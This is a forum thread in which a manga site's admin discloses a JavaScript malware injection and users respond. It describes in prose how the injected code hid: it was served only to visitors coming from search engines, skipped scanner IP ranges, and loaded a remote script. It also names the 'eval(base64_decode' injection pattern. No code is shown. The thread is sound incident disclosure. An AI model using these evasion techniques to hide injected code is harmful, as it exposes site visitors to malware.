62 replies to this topic

[Grumpy]

Well... don't panic... but it appears Batoto has been hacked.

 

 

Google scanner reported that there is malware present on this site about half a day ago from this post date which caused the malware warning being displayed to anyone trying to visit the site which started the investigation.

 

An encrypted javascript injection (simply malware/virus) was found in Batoto's skin code, namely Deluxe. This is highly concerning since the admins are the only ones supposed to be the only one who should be able to access that. I cleaned out the infection, but later decided to nuke the entire skin as there may be more lingering pieces. Deluxe skin has been deleted and will not be restored. In place, our old skin, Sylo is back to default and Blood is still there as an option.

 

At this time, I am unable to be certain of the scope of the damage or the point of vulnerability. I am going to further investigate as to since when this virus was present later.

 

I'm not sure what the injected javascript does, because whenever I tried to access it, I either got an already suspended account it led to or a file not found page (404). But it is possible the not-found page is a disguise since it's possible to make the URL time gated and/or referrer gated to prevent accessing the same URL again later. At the same time, it's entirely possible the URL the virus tried to load really didn't exist and resulted in no action.

 

The virus itself seems to often hide itself, thus making detection difficult. On top of that, it seems very new (or recently altered) and does not exist in many anti-malware's database. That's why there were even notices by Google saying there's malware but found 0 pages with it. Almost no scanner I tried had detected it and almost gave up using scanners. It seems to have targeted IE users. I could not make the injected code appear using using firefox/chrome browser headers. It targeted users that came from a search engine. It was also invisible to standard googlebot.

 

During investigation, I also found out that the same kind of virus was previously present at another IPB site, completely independent of ours. And similarly, it is running version 3.4.6 (latest). So it seems most likely that this virus targets IPB sites and may be a zero-day exploit (an exploit that a patch does not exist for). I've sent little, but much info as I can to IPB as well in case it really is a zero-day attack vs IPB systems.

 

The biggest concern right now is that I still don't know exactly how the system was breached. If this really is an attack vs current version IPB system, I can't guarantee the virus won't return. If it was an exploit caused by the Deluxe skin, I have rid of it, but that's just a guess. I've been scouring the logs for last few hours... and besides the typical dozens attempts that failed (this is nothing specific to us, just life of sys admin), I really don't see anything special right now.

 

 

AS OF NOW

no unknown 3rd party items are being pulled during loading of Batoto pages. So google is no longer flagging us as suspicious.

 

If you see anything suspicious from this moment on, please report them immediately! If you don't have an account, you can email me: [email protected]

 

 

Security tips & Profiling

These kind of malware (javascript injected into sites) are typically are after putting their ads / redirecting you to somewhere else / installing virus on your computer. From the reports I've gotten, it doesn't seem like that's happening. But just as a tip... If this site, heck any site or anything, anywhere EVER tells you to install something, don't. Only time you want to install something is if you initiated it. If you went out to search and install that thing.

 

Also, if you'd like, Batoto is designed to be able to run without JS or flash. You can run this site with pure html & css only which has zero risk. But certain features will be inaccessible.

 

 

tl;dr

It looks like we're okay. But we might not be.

 

 

p.s. This incident is not related to the ads.

Edited by Grumpy, 22 August 2014 - 01:05 AM.
updated few things

[Aoitenshi1]

And here I thought this was why you had removed the ads.

 

EDIT: I see that they're back on now though.

Edited by AoiTenshi1, 21 August 2014 - 03:14 PM.

[ku4eto]

javascript injection is not something much used... from my experience largely phpis injected with redirections or eval(base64_decode crap. BTW , as this are system files whcih are not supposed to have been updated any time soon , you can run an SSH to filter out any files that have been updates at that date. But you said that you were sys admin, so i suppose you have done that already....

[notsostupidusername]

Can't report anything out of the ordinary, so I guess at least I'm fine? I ignored the Chrome warning.

[Hakim El Ghazouani]

Well i experienced the warning with the Blood skin about an hour ago, but i just got back, and now i get no warning at all

[Divide Overflow]

Makes me happy I uninstalled java long ago.

[Halo]

... It seems to have targeted IE users.

So nobody was affected? Sweet.

[Fruit]

Hopefully it won't return eh. If it's a zero day, gege.

You should redirect people who uses IE to a page where it says like "This website might not be safe on IE, use another browser or proceed with caution.".

So nobody was affected? Sweet.

More use IE than what you think.

[Mizura]

Huh! I was wondering what that was about! Thanks for fixing it so quickly.

[PkmSilver]

I got a random Java Update today but then I couldn't cancel it. Is it something related with Batoto random Malware?

[Aurega]

NoScript FTW!

 

But good job Grumpy!

Edited by Aurega, 21 August 2014 - 04:32 PM.

[Ascheroth]

I got a random Java Update today but then I couldn't cancel it. Is it something related with Batoto random Malware?

Java has absolutely nothing to do with JavaScript, so no, it wasn't related.

[CatMtKing]

Makes me happy I uninstalled java long ago.

Java is not Javascript (they are two very different computer languages).  Every browser comes with a Javascript interpreter, and unless something intercepts it, JS code will be executed when you visit the webpage.

Edited by CatMtKing, 21 August 2014 - 04:58 PM.

[truepurple]

I told chrome to ignore the maleware to visit batoto before you fixed the issue, do I have to worry about having been infected?

[Baniita]

So nobody was affected? Sweet.

 

lmfao

 

More use IE than what you think.

 

None of whom have a clue what they're doing.

[Shrimpeh]

Thx for the update Grumpy.

Well... don't panic... but it appears Batoto has been hacked.

i bet everybody who read this went and atleast did a quick scan of their computer.
 

You should redirect people who uses IE to a page where it says like "This website might not be safe on IE, use another browser or proceed with caution.".

i like this idea, may make people use something else.
 

More use IE than what you think.

everybody should know by now that they shouldn't use IE, we are in 2014, not 2000.
Newer versions may have been better, but it still sucks.

Edited by Alex Shrimpostur, 21 August 2014 - 05:36 PM.

[Grumpy]

Okay. I did a bit more reverse engineering.

 

The javascript code was injected from PHP.

It appears it does target all commonly used browser. I'm not sure why my previous test with chrome/firefox kept on resulting in no data.

It also avoids certain sets of ip ranges, including google crawler. I'm guessing it's a list of well known scanner IPs as to avoid detection from scans.

It only loads the javascript when you come from a search engine. So, if you visited via bookmark, typed address, or even non-search engines like reddit, you wouldn't have been affected.

 

The code that I reverse engineered really showed no interest other than hoarding IPs and ... (below)

 

Ultimately, the end goal (from what is put on our site) is to load their javascript hosted on their site. The contents of which is still mystery to me since the combos I tried get 404s. But it's quite clear to me now that it will actually lead to a malware. According to Google's report however, it does seem to lead to some sort of execution in the end (in which form is unspecified). Lots of it too. Said 17 processes on average.

 

=================================

 

I've also talked to IPB. They (technically he, talked to one person) think it's a result of an administrator account being breached with a remote script. Reason being similar cases were made before back in 2012 and that was the source of the cause. But...

- I changed passwords twice since the last security announcement. And used no where else.

- I know treb also has a unique pass to this site only... generated.

- mhh, I don't know the strength of password, but know he changed now and during last security announcement.

- Last admin account is actually one used by ip board support guy long long ago... (this account has been demoted now)

 

=================================

 

If the hole really is the breached admin account which is solved by changing password AND all it did was put in JS script damage seems fairly minimal for amount of access that was made. I suppose I should start firewalling the admin stuff...

Edited by Grumpy, 22 August 2014 - 01:16 AM.

[truepurple]

It only loads the javascript when you come from a search engine. So, if you visited via bookmark, typed address, or even non-search engines like reddit, you wouldn't have seen it.

 

 

I got the message when visiting directly from chrome or firefox.

 

So do I have to worry about having been infected or not grumpy? (because like I said, I ignored the warning on chrome to visit before you fixed the issue) It seems from what you said, no, but I want to make sure.

Edited by truepurple, 21 August 2014 - 05:42 PM.

[rc1138]

Wow what a scary world we live in. The last time I felt so was when Ebay was hacked. Even though they told that no personal data was stolen I still get a lot of spam(not like I care about it)

[Halo]

I suppose I should start firewalling the admin stuff...

Yeah, probably.

MangaTraders.com
never forget